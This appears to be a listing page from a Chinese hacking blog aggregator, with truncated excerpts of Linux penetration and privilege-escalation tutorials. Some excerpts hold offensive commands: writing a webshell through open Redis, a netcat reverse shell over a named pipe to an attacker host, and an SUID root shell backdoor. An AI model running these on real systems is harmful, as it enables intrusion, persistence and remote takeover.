记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

科普:Redis 匿名访问利用技巧

Redis 数据库在内网渗透中比较常见,结合近期的利用过程,记录下: 在内网机器中下载Redis 解压 make一下,不用make install A) 一般情况下知道路径写shell./redis-cli -h IP config set dir /home/wwwroot/default/ config set dbfilename redis.php set webshell "<?php phpinfo(); ?>" save参考 https://www.secpulse.com/archives/5357.html B) 利用公匙免密码登录 1 本机生成公匙 2 利用redis将公匙备份到redis机器上 参考 https://www.secpulse.co
发布时间:2016-11-04 19:50 | 阅读:131096 | 评论:0 | 标签:信息安全 linux渗透 网络安全

Linux内核通杀提权漏洞预警

Linux内核在处理内存写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。 漏洞危害:低权限用户可以利用该漏洞修改只读内存,进而执行任意代码获取 root 权限。影响范围: 该漏洞影响所有 Linux Kernel >= 2.6.22 的版本。2.6.22 是 2007 年发布的版本,也就是说这个漏洞几乎影响 2007 以后的所有版本。 漏洞测试:读取 /proc/version 来获取 LinuxKernel 版本: ➜ ~ cat /proc/version Linuxversion 4.4.0-42-generic(buildd@lgw01-13)
发布时间:2016-10-29 18:20 | 阅读:136810 | 评论:0 | 标签:ShellCode&Poc linux渗透 权限提升 漏洞利用 网络安全 提权 漏洞

用Linux肉鸡渗透一个小型内网的思路

91ri.org注:本案例中的拿shell方法比较简单,篇幅有限我们只看主要的,从拿到权限开始讲述。 安装后门 进入系统后,我的RP是如此滴幸运,竟然是root权限。。。 查看下passwd账号信息 目录树结构: 因为既然要内网渗透,权限可能会随时丢失,下面就先安装个ssh后门,本来是想安装pam后门呢,因为所有账号登陆服务器时都要验证pam模块,而pam后门刚好可以截取用户密码,但是呢,看他内核是(Linux jcms 2.6.32-71.el6.i686 #1 SMP Wed Sep 1 01:26:34 EDT 2010i686 i686 i386 GNU/Linux)肯定是redhat/centos6的系统 确实是6.0的,而且还是redhat企业版操作系统,有点头疼了,至于为什么?一会你就知道
发布时间:2015-03-02 18:05 | 阅读:120474 | 评论:0 | 标签:渗透实例 linux渗透 内网渗透 权限提升 渗透测试

Linux提权的一个问题:/bin/bash^M: bad interpreter: No such file or directory

执行一个脚本 exploit.sh 时, 一直是提示我: -bash: ./exploit.sh: /bin/bash^M: bad interpreter: No such file or directory 出现上面错误的原因之一是脚本文件是DOS格式的, 即每一行的行尾以rn来标识, 使用vim编辑器打开脚本, 运行: :set ff? 可以看到DOS或UNIX的字样. 使用set ff=unix把它强制为unix格式的, 然后存盘退出, 即可. 或者 使用:sed -i 's/r//g' exploit.sh#把所有的”r“ 换成 “ ” 【via@人生注入点】
发布时间:2014-09-04 17:15 | 阅读:87639 | 评论:0 | 标签:渗透技巧 linux渗透 权限提升 渗透测试 提权

CVE-2014-0476:Chkrootkit Local Root分析

rootkit从浅显的层面来讲即一种具有自我隐蔽性的后门程序,它往往被入侵者作为一种入侵工具。通过rootkit,入侵者可以偷偷控制被入侵的电脑,因此危害巨大。chkrootkit是一个Linux系统下的查找检测rootkit后门的工具。 本次漏洞出现在一个执行的地方没有加 引号保护 导致可以执行程序 SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c" SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"定义了 执行检测的
发布时间:2014-08-30 21:55 | 阅读:279603 | 评论:0 | 标签:渗透技巧 linux渗透 权限提升 渗透测试

*Unix系统NC反弹shell的方法

Unix系统自带NC,但是为了安全,一般不会编译-e选项,也就无法反弹shell。但是可以变换一下思路,不直接使用NC反弹shell,而是反弹一个拥有shell权限的管道。NC的原生做法:nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /tmp/backpipe p然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe91ri.org:攻防的对抗一直在思路的转变之间,将原有思路逆转,可能收获不一样的东西! 文中若未特别声明转载请
发布时间:2014-07-14 14:05 | 阅读:110820 | 评论:0 | 标签:渗透技巧 linux渗透 提权 渗透测试

[译]CVE-2014-4014:Linux内核本地权限提升利用

介绍我们知道,CLONE_NEWUSER名称空间在Linux 2.6.23版本中被引入,最终完成于Linux3.8(从3.8开始,非特权进程也可以创建用户名称空间)。它被用于用户和组ID号空间,即一个进程的用户和组ID可以变得无论是从内部还是外部,用户空间都不同。举个例子,一个普通(非特权)进程就可以创建一个uid为0的名称空间。因此,一个用户名称空间内部的用户和组ID,到外部的用户和组ID间的映射是很有必要存在的。这种映射允许操作系统在当一个进程在用户名称空间内执行操作,影响到外部名称空间时执行适当的权限检查。如,文件系统访问。但是,许多的Linux文件系统对“user-namespace”的识别并不完整。其问题就在于错误的使用inode_capable()来决定用户或组的功能。让我们看一看 inode_ch
发布时间:2014-06-26 15:55 | 阅读:107407 | 评论:0 | 标签:本地溢出 linux渗透 渗透测试 漏洞利用

再谈SMB中继攻击

PS:下面的都是自己实际测试过的,并非理论文章,如果有什么地方不对的请斧正,谢谢 >_<首先,介绍一下攻击的运作原理假设左边的主机为A,右边的主机为BA试图访问B的共享服务第一步 A对B说:骚年,请让我登陆第二步 B对A说:骚年,我给你一个challenge,请先把你的密码Hash和challenge加密一下返回给我,我得确认你是否有权限第三步 A对B说:我加密好了,给你情景一:第四步 B对A说:嗯,对的,请进(认证结束)情景二:第四步 B对A说:骚年,不对,你的身份不能登陆,你可以试试以别人的身份来登陆第五步 A对B说:好嘛,我用你之前告诉我的身份试试,回到第一步,循环下去现在,如果加入了一名第三者C到两者之间,C企图查看B的隐私,C会怎么做?上图就
发布时间:2014-03-14 15:15 | 阅读:140164 | 评论:0 | 标签:渗透技巧 linux渗透 metasploit 渗透测试

Linux后门的两种姿势(suid shell与inetd后门)

前提: 你现在已经是root用户, 想留一个后门以便日后再一次爆菊花。系统环境: dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell关于SUID位的知识,请戳这里首先, 先切换成为root用户,并执行以下的命令:dawg:~# cp /bin/bash /.woot dawg:~# chmod 4755 /.woot dawg:~# ls -al /.woot -rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不
发布时间:2014-03-05 19:05 | 阅读:87678 | 评论:0 | 标签:渗透技巧 linux渗透 提权 渗透测试 后门

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云